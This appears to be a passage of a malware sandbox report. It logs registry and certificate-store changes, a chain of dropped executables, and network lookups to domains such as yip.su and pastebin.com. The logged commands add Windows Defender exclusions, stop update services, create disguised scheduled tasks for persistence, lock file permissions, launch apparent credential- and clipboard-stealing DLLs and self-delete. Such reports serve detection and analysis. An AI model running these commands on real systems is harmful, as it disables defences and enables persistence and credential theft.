| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 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 | C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 190000000100000010000000ffac207997bb2cfe865570179ee037b90f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e404000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 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 | C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 | C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 | C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 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 | C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 | C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 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 | C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
C:\Users\Admin\Pictures\ZRBeoPgeGj8CxG9qYs8sjAht.exe
"C:\Users\Admin\Pictures\ZRBeoPgeGj8CxG9qYs8sjAht.exe"
C:\Users\Admin\Pictures\yfbdsjlje4JOSrr5jnDosrVb.exe
"C:\Users\Admin\Pictures\yfbdsjlje4JOSrr5jnDosrVb.exe"
C:\Users\Admin\Pictures\B1MtcJ18Lphr2749qh03SbWR.exe
"C:\Users\Admin\Pictures\B1MtcJ18Lphr2749qh03SbWR.exe"
C:\Users\Admin\Pictures\b8BD8mUZg1QzK4WHCOlyefC6.exe
"C:\Users\Admin\Pictures\b8BD8mUZg1QzK4WHCOlyefC6.exe"
C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe
"C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe"
C:\Users\Admin\Pictures\InrSNGhXx4T6LsNwqSxd93uX.exe
"C:\Users\Admin\Pictures\InrSNGhXx4T6LsNwqSxd93uX.exe"
C:\Users\Admin\Pictures\kepPL1XOY5LSSrh2bfHa1ijC.exe
"C:\Users\Admin\Pictures\kepPL1XOY5LSSrh2bfHa1ijC.exe"
C:\Users\Admin\Pictures\WmYtLkKaP9RNVnFfd1iN0jGZ.exe
"C:\Users\Admin\Pictures\WmYtLkKaP9RNVnFfd1iN0jGZ.exe"
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
"C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe"
C:\Users\Admin\AppData\Local\Temp\is-COA0R.tmp\InrSNGhXx4T6LsNwqSxd93uX.tmp
"C:\Users\Admin\AppData\Local\Temp\is-COA0R.tmp\InrSNGhXx4T6LsNwqSxd93uX.tmp" /SL5="$B01BC,491750,408064,C:\Users\Admin\Pictures\InrSNGhXx4T6LsNwqSxd93uX.exe"
C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe
C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.16 --initial-client-data=0x2e0,0x2e4,0x2e8,0x2bc,0x2ec,0x6fe58538,0x6fe58548,0x6fe58554
C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe
"C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe" --silent --allusers=0
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\eszj1FzD5qG7Qoq4NGLteMV8.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\eszj1FzD5qG7Qoq4NGLteMV8.exe" --version
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F
C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe
"C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=4332 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231004220046" --session-guid=4df762ca-d00d-4038-a583-2029e926e20c --server-tracking-blob=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 --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=4005000000000000
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "Admin:N"&&CACLS "nhdues.exe" /P "Admin:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "Admin:N"&&CACLS "..\1ff8bec27e" /P "Admin:R" /E&&Exit
C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe
C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.16 --initial-client-data=0x2ec,0x2f0,0x2f4,0x2bc,0x2f8,0x6eba8538,0x6eba8548,0x6eba8554
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe
"C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe" /S /UID=lylal220
C:\Users\Admin\AppData\Local\Temp\1000042051\s6.exe
"C:\Users\Admin\AppData\Local\Temp\1000042051\s6.exe"
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "nhdues.exe" /P "Admin:N"
C:\Program Files\Microsoft Office 15\TFZIZKLLGT\lightcleaner.exe
"C:\Program Files\Microsoft Office 15\TFZIZKLLGT\lightcleaner.exe" /VERYSILENT
C:\Users\Admin\AppData\Local\Temp\5a-73843-b69-7dcb7-18de614ef0c69\Waegumeqolu.exe
"C:\Users\Admin\AppData\Local\Temp\5a-73843-b69-7dcb7-18de614ef0c69\Waegumeqolu.exe"
C:\Windows\SysWOW64\cacls.exe
CACLS "nhdues.exe" /P "Admin:R" /E
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
dw20.exe -x -s 808
C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp" /SL5="$A020C,833775,56832,C:\Program Files\Microsoft Office 15\TFZIZKLLGT\lightcleaner.exe" /VERYSILENT
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\1ff8bec27e" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\1ff8bec27e" /P "Admin:R" /E
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml"
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe"
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\assistant_installer.exe" --version
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=100.0.4815.21 --initial-client-data=0x26c,0x270,0x274,0x248,0x278,0x25e8a0,0x25e8b0,0x25e8bc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\xyvvnnvseiqa.xml"
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\3594612327.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\0694413361.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\7004201895.exe"
C:\Users\Admin\AppData\Local\Temp\3594612327.exe
"C:\Users\Admin\AppData\Local\Temp\3594612327.exe"
C:\Users\Admin\AppData\Local\Temp\0694413361.exe
"C:\Users\Admin\AppData\Local\Temp\0694413361.exe"
C:\Users\Admin\AppData\Local\Temp\7004201895.exe
"C:\Users\Admin\AppData\Local\Temp\7004201895.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "s6.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1000042051\s6.exe" & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3360 -ip 3360
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1908 -ip 1908
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3360 -s 1876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1908 -s 1876
C:\Windows\SysWOW64\taskkill.exe
taskkill /im "s6.exe" /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "B1MtcJ18Lphr2749qh03SbWR.exe" /f & erase "C:\Users\Admin\Pictures\B1MtcJ18Lphr2749qh03SbWR.exe" & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 4752 -ip 4752
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4752 -s 1444
C:\Windows\SysWOW64\taskkill.exe
taskkill /im "B1MtcJ18Lphr2749qh03SbWR.exe" /f
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61 C:\Users\Admin\AppData\Local\Temp\7004201895.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.208.253.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.211.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.67.143:443 | pastebin.com | tcp |
| DE | 148.251.234.93:443 | yip.su | tcp |
| US | 8.8.8.8:53 | flyawayaero.net | udp |
| US | 8.8.8.8:53 | downloads.digitalpulsedata.com | udp |
